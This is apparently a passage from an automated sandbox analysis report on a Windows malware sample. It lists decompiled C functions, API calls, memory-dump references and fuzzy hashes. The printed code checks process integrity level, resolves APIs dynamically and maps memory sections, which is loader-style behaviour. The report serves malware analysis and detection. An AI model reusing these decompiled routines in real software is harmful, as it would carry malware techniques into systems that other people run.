                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1814172918-0
                                                                                                                                                                                                                                          • Opcode ID: 8d8f06fad0da5ba30e59a6235b152017174417165139cfaa6194296f21df1708
                                                                                                                                                                                                                                          • Instruction ID: bbbe005b37f8c613e85644989e936f64ed53a6b421c19c3c89d67bc4bc3a52d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d8f06fad0da5ba30e59a6235b152017174417165139cfaa6194296f21df1708
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B21DE7A600214BBD739EFA8DC45F8E3BB9AB45710F210120F615E6180EB709964CB94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E011253E3(long* _a4) {
                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                          				void _v16;
                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_v16 = 1;
                                                                                                                                                                                                                                          				_v20 = 0x2000;
                                                                                                                                                                                                                                          				if( *0x112d25c > 5) {
                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                          						if(_v8 != 0) {
                                                                                                                                                                                                                                          							_t46 = E011258BE(_v8);
                                                                                                                                                                                                                                          							if(_t46 != 0) {
                                                                                                                                                                                                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                                                                          								if(_t33 != 0) {
                                                                                                                                                                                                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								E0112147E(_t46);
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						CloseHandle(_v12);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				 *_a4 = _v20;
                                                                                                                                                                                                                                          				return _v16;
                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                          0x011253f0
                                                                                                                                                                                                                                          0x011253f7
                                                                                                                                                                                                                                          0x011253fe
                                                                                                                                                                                                                                          0x01125412
                                                                                                                                                                                                                                          0x0112541d
                                                                                                                                                                                                                                          0x01125435
                                                                                                                                                                                                                                          0x01125442
                                                                                                                                                                                                                                          0x01125445
                                                                                                                                                                                                                                          0x0112544a
                                                                                                                                                                                                                                          0x01125455
                                                                                                                                                                                                                                          0x01125459
                                                                                                                                                                                                                                          0x01125468
                                                                                                                                                                                                                                          0x0112546c
                                                                                                                                                                                                                                          0x01125488
                                                                                                                                                                                                                                          0x01125488
                                                                                                                                                                                                                                          0x0112548c
                                                                                                                                                                                                                                          0x0112548c
                                                                                                                                                                                                                                          0x01125491
                                                                                                                                                                                                                                          0x01125495
                                                                                                                                                                                                                                          0x0112549b
                                                                                                                                                                                                                                          0x0112549c
                                                                                                                                                                                                                                          0x011254a3
                                                                                                                                                                                                                                          0x011254a9

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01125415
                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 01125435
                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 01125445
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 01125495
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 01125468
                                                                                                                                                                                                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01125470
                                                                                                                                                                                                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01125480
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1295030180-0
                                                                                                                                                                                                                                          • Opcode ID: 18a20d478d503496efa97060b9bc7c31247af47e473552e832d8a1d1588321a8
                                                                                                                                                                                                                                          • Instruction ID: fa43d56a87e31e7110f79294ff0bd557e32839e57912a30c056484c397949a3e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a20d478d503496efa97060b9bc7c31247af47e473552e832d8a1d1588321a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86216D75A00259FFEF24DFA4DC84EEEBF79EB04304F104065E610A6260D7759A61DF60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                          			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                          				long _t9;
                                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                          				_t9 = _a8;
                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                          				if(_t9 == 0) {
                                                                                                                                                                                                                                          					_t10 = InterlockedDecrement(0x404108);
                                                                                                                                                                                                                                          					__eflags = _t10;
                                                                                                                                                                                                                                          					if(_t10 == 0) {
                                                                                                                                                                                                                                          						__eflags =  *0x40410c;
                                                                                                                                                                                                                                          						if( *0x40410c != 0) {
                                                                                                                                                                                                                                          							_t36 = 0x2710;
                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                          								SleepEx(0x64, 1);
                                                                                                                                                                                                                                          								__eflags =  *0x404118;
                                                                                                                                                                                                                                          								if( *0x404118 == 0) {
                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                          								__eflags = _t36;
                                                                                                                                                                                                                                          								if(_t36 > 0) {
                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							CloseHandle( *0x40410c);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						HeapDestroy( *0x404110);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {
                                                                                                                                                                                                                                          						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                          						 *0x404110 = _t18;
                                                                                                                                                                                                                                          						_t41 = _t18;
                                                                                                                                                                                                                                          						if(_t18 == 0) {
                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							 *0x404130 = _a4;
                                                                                                                                                                                                                                          							asm("lock xadd [eax], ebx");
                                                                                                                                                                                                                                          							_t23 = CreateThread(0, 0, E0040103B, E0040105A(_a12, 0, 0x404118, _t41), 0,  &_a8); // executed
                                                                                                                                                                                                                                          							 *0x40410c = _t23;
                                                                                                                                                                                                                                          							if(_t23 == 0) {
                                                                                                                                                                                                                                          								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                          0x00401957
                                                                                                                                                                                                                                          0x00401963
                                                                                                                                                                                                                                          0x00401965
                                                                                                                                                                                                                                          0x00401968
                                                                                                                                                                                                                                          0x004019e2
                                                                                                                                                                                                                                          0x004019e8
                                                                                                                                                                                                                                          0x004019ea
                                                                                                                                                                                                                                          0x004019ec
                                                                                                                                                                                                                                          0x004019f2
                                                                                                                                                                                                                                          0x004019f4
                                                                                                                                                                                                                                          0x004019f9
                                                                                                                                                                                                                                          0x004019fc
                                                                                                                                                                                                                                          0x00401a07
                                                                                                                                                                                                                                          0x00401a09
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401a0b
                                                                                                                                                                                                                                          0x00401a0e
                                                                                                                                                                                                                                          0x00401a10
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401a10
                                                                                                                                                                                                                                          0x00401a18
                                                                                                                                                                                                                                          0x00401a18
                                                                                                                                                                                                                                          0x00401a24
                                                                                                                                                                                                                                          0x00401a24
                                                                                                                                                                                                                                          0x0040196a
                                                                                                                                                                                                                                          0x0040196b
                                                                                                                                                                                                                                          0x0040198b
                                                                                                                                                                                                                                          0x00401991
                                                                                                                                                                                                                                          0x00401996
                                                                                                                                                                                                                                          0x00401998
                                                                                                                                                                                                                                          0x004019d8
                                                                                                                                                                                                                                          0x004019d8
                                                                                                                                                                                                                                          0x0040199a
                                                                                                                                                                                                                                          0x004019a2
                                                                                                                                                                                                                                          0x004019a9
                                                                                                                                                                                                                                          0x004019c2
                                                                                                                                                                                                                                          0x004019c8
                                                                                                                                                                                                                                          0x004019cf
                                                                                                                                                                                                                                          0x004019d4
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004019d4
                                                                                                                                                                                                                                          0x004019cf
                                                                                                                                                                                                                                          0x00401998
                                                                                                                                                                                                                                          0x0040196b
                                                                                                                                                                                                                                          0x00401a31

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(00404108), ref: 00401976
                                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0040198B
                                                                                                                                                                                                                                          • CreateThread.KERNELBASE ref: 004019C2
                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(00404108), ref: 004019E2
                                                                                                                                                                                                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 004019FC
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00401A18
                                                                                                                                                                                                                                          • HeapDestroy.KERNEL32 ref: 00401A24
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3416589138-0
                                                                                                                                                                                                                                          • Opcode ID: 44ccef76f4ce31eeeca5324c3b88906bc10cd886d3300b2955b61f5ac9214176
                                                                                                                                                                                                                                          • Instruction ID: a0ab11432e77b84ae515e188bafeff82c6af5491473b460d6bc066eb84a28543
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44ccef76f4ce31eeeca5324c3b88906bc10cd886d3300b2955b61f5ac9214176
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D2180B1701205AFC7109F69AD88A6A7BA8F7E5751714413AF601F72A0E6788D408F58
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0112A09B
                                                                                                                                                                                                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 0112A11E
                                                                                                                                                                                                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 0112A15E
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0112A180
                                                                                                                                                                                                                                            • Part of subcall function 011291B5: SysAllocString.OLEAUT32(0112C298), ref: 01129205
                                                                                                                                                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 0112A1D3
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0112A1E2
                                                                                                                                                                                                                                            • Part of subcall function 0112A872: Sleep.KERNELBASE(000001F4), ref: 0112A8BA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2118684380-0
                                                                                                                                                                                                                                          • Opcode ID: dd9493974696690d2a77e94aac21150356c74d15fa017476fb22b0dc9486979d
                                                                                                                                                                                                                                          • Instruction ID: 66b0ff55f5feae027b11ef471a1116bb88c622add20a6a923860fc29949adf74
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd9493974696690d2a77e94aac21150356c74d15fa017476fb22b0dc9486979d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F51A53550060ABFDB15DFA8D844A9EBBB6FF88750F248829E615DB210EB30ED55CB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E00401F61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                          				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                          				intOrPtr _t54;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t54 = E00401026(0x20);
                                                                                                                                                                                                                                          				if(_t54 == 0) {
                                                                                                                                                                                                                                          					_v8 = 8;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t48 = GetModuleHandleA( *0x404144 + 0x405014);
                                                                                                                                                                                                                                          					_v8 = 0x7f;
                                                                                                                                                                                                                                          					_t28 = GetProcAddress(_t48,  *0x404144 + 0x40514c);
                                                                                                                                                                                                                                          					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                          					if(_t28 == 0) {
                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                          						E00401938(_t54);
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t32 = GetProcAddress(_t48,  *0x404144 + 0x40515c);
                                                                                                                                                                                                                                          						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                          						if(_t32 == 0) {
                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t35 = GetProcAddress(_t48,  *0x404144 + 0x40516f);
                                                                                                                                                                                                                                          							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                          							if(_t35 == 0) {
                                                                                                                                                                                                                                          								goto L8;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_t38 = GetProcAddress(_t48,  *0x404144 + 0x405184);
                                                                                                                                                                                                                                          								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                          								if(_t38 == 0) {
                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									_t41 = GetProcAddress(_t48,  *0x404144 + 0x40519a);
                                                                                                                                                                                                                                          									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                          									if(_t41 == 0) {
                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                          										_t44 = E00401A34(_t54, _a8); // executed
                                                                                                                                                                                                                                          										_v8 = _t44;
                                                                                                                                                                                                                                          										if(_t44 != 0) {
                                                                                                                                                                                                                                          											goto L8;
                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                          											 *_a12 = _t54;
                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                          0x00401f70
                                                                                                                                                                                                                                          0x00401f74
                                                                                                                                                                                                                                          0x00402036
                                                                                                                                                                                                                                          0x00401f7a
                                                                                                                                                                                                                                          0x00401f92
                                                                                                                                                                                                                                          0x00401fa1
                                                                                                                                                                                                                                          0x00401fa8
                                                                                                                                                                                                                                          0x00401faa
                                                                                                                                                                                                                                          0x00401faf
                                                                                                                                                                                                                                          0x0040202e
                                                                                                                                                                                                                                          0x0040202f
                                                                                                                                                                                                                                          0x00401fb1
                                                                                                                                                                                                                                          0x00401fbe
                                                                                                                                                                                                                                          0x00401fc0
                                                                                                                                                                                                                                          0x00401fc5
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401fc7
                                                                                                                                                                                                                                          0x00401fd4
                                                                                                                                                                                                                                          0x00401fd6
                                                                                                                                                                                                                                          0x00401fdb
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401fdd
                                                                                                                                                                                                                                          0x00401fea
                                                                                                                                                                                                                                          0x00401fec
                                                                                                                                                                                                                                          0x00401ff1
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401ff3
                                                                                                                                                                                                                                          0x00402000
                                                                                                                                                                                                                                          0x00402002
                                                                                                                                                                                                                                          0x00402007
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402009
                                                                                                                                                                                                                                          0x0040200f
                                                                                                                                                                                                                                          0x00402014
                                                                                                                                                                                                                                          0x0040201b
                                                                                                                                                                                                                                          0x00402020
                                                                                                                                                                                                                                          0x00402025
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402027
                                                                                                                                                                                                                                          0x0040202a
                                                                                                                                                                                                                                          0x0040202a
                                                                                                                                                                                                                                          0x00402025
                                                                                                                                                                                                                                          0x00402007
                                                                                                                                                                                                                                          0x00401ff1
                                                                                                                                                                                                                                          0x00401fdb
                                                                                                                                                                                                                                          0x00401fc5
                                                                                                                                                                                                                                          0x00401faf
                                                                                                                                                                                                                                          0x00402044

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00401026: HeapAlloc.KERNEL32(00000000,?,00401329,00000208,?,-00000008,?,?,?,0040122F,?), ref: 00401032
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00401B06,?,?,?,?,00000002,?,0040178F), ref: 00401F86
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FA8
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FBE
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FD4
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FEA
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00402000
                                                                                                                                                                                                                                            • Part of subcall function 00401A34: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401A91
                                                                                                                                                                                                                                            • Part of subcall function 00401A34: memset.NTDLL ref: 00401AB3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1632424568-0
                                                                                                                                                                                                                                          • Opcode ID: bdecdfe8be8964bc3f68c73273cd601846a070c5aeaf0cc420d3301f83d310a9
                                                                                                                                                                                                                                          • Instruction ID: 7231f389cd8be8db14db85a4f8175327975b3e6d23b460530a12d7a5a8207ee9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdecdfe8be8964bc3f68c73273cd601846a070c5aeaf0cc420d3301f83d310a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 432119B060070AAFD721DF69DE48E6BB7ECEB543447004076E605EB2A1E6B4E905CF68
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 57%
                                                                                                                                                                                                                                          			E01124908(signed int __edx) {
                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                          				CHAR* _v16;
                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                                                          				CHAR* _t22;
                                                                                                                                                                                                                                          				CHAR* _t25;
                                                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                                                          				CHAR* _t36;
                                                                                                                                                                                                                                          				CHAR* _t43;
                                                                                                                                                                                                                                          				CHAR* _t44;
                                                                                                                                                                                                                                          				CHAR* _t46;
                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                                                          				signed char _t56;
                                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                                                          				CHAR* _t67;
                                                                                                                                                                                                                                          				CHAR* _t68;
                                                                                                                                                                                                                                          				char* _t69;
                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t61 = __edx;
                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                                          				_t21 = E011211AF();
                                                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                                                          					_t59 =  *0x112d25c; // 0x4000000a
                                                                                                                                                                                                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                          					 *0x112d25c = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t22 =  *0x112d164(0, 2);
                                                                                                                                                                                                                                          				_v16 = _t22;
                                                                                                                                                                                                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                                          					_t25 = E01121111( &_v8,  &_v20); // executed
                                                                                                                                                                                                                                          					_t54 = _t25;
                                                                                                                                                                                                                                          					_t26 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					if( *0x112d25c > 5) {
                                                                                                                                                                                                                                          						_t8 = _t26 + 0x112e5cd; // 0x4d283a53
                                                                                                                                                                                                                                          						_t27 = _t8;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t7 = _t26 + 0x112ea05; // 0x44283a44
                                                                                                                                                                                                                                          						_t27 = _t7;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					E01121EC4(_t27, _t27);
                                                                                                                                                                                                                                          					_t31 = E01121A4E(_t61,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                          					if(_t31 == 0) {
                                                                                                                                                                                                                                          						CloseHandle(_v20);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t63 = 5;
                                                                                                                                                                                                                                          					if(_t54 != _t63) {
                                                                                                                                                                                                                                          						 *0x112d270 =  *0x112d270 ^ 0x81bbe65d;
                                                                                                                                                                                                                                          						_t32 = E011258BE(0x60);
                                                                                                                                                                                                                                          						 *0x112d324 = _t32;
                                                                                                                                                                                                                                          						__eflags = _t32;
                                                                                                                                                                                                                                          						if(_t32 == 0) {
                                                                                                                                                                                                                                          							_push(8);
                                                                                                                                                                                                                                          							_pop(0);
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							memset(_t32, 0, 0x60);
                                                                                                                                                                                                                                          							_t49 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          							_t70 = _t70 + 0xc;
                                                                                                                                                                                                                                          							__imp__(_t49 + 0x40);
                                                                                                                                                                                                                                          							_t51 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          							 *_t51 = 0x112e845;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t54 = 0;
                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                          						if(0 == 0) {
                                                                                                                                                                                                                                          							_t36 = RtlAllocateHeap( *0x112d238, 0, 0x43);
                                                                                                                                                                                                                                          							 *0x112d2c4 = _t36;
                                                                                                                                                                                                                                          							__eflags = _t36;
                                                                                                                                                                                                                                          							if(_t36 == 0) {
                                                                                                                                                                                                                                          								_push(8);
                                                                                                                                                                                                                                          								_pop(0);
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_t56 =  *0x112d25c; // 0x4000000a
                                                                                                                                                                                                                                          								_t61 = _t56 & 0x000000ff;
                                                                                                                                                                                                                                          								_t58 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          								_t13 = _t58 + 0x112e55a; // 0x697a6f4d
                                                                                                                                                                                                                                          								_t55 = _t13;
                                                                                                                                                                                                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x112c28f);
                                                                                                                                                                                                                                          							}
